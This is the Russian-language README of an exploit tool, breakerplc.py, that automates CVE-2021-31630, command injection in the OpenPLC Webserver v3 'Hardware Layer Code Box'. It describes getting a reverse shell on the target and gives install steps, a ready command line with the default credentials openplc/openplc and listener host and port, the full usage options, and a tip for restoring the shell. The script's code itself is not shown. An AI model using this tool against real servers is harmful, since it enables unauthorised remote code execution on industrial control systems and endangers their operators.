
Это автоматизация эксплуатации cve-2021-31630
Этот скрипт автоматически эксплуатирует уязвимость в OpenPLC Web Server v3.
Вы сможете создавать автоматическую реверс-оболочку (reverse shell) на сервере, не прибегая к ручным техникам.
Описание CVE-2021-31630 Инъекция команд в Open PLC Webserver v3 позволяет удалённым злоумышленникам выполнять произвольный код через компонент "Hardware Layer Code Box" на странице "/hardware" приложения.
Скрипт был доработан так, что после завершения регистрации скрипта в OpenPLC он создаёт оболочку машины в том же терминале.
Используйте команду ниже (рекомендуем создать виртуальное окружение Python для установки зависимостей) # Однако сценарий breakerplc.py должен выполняться вне виртуального окружения.
sudo apt update
pip3 install requests
Как использовать? Вы можете использовать эту командную строку (ниже).
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

ВАЖНО После подключения вам нужно ввести "whoami" или "ls", чтобы разорвать строку кода и вернуть оболочку.
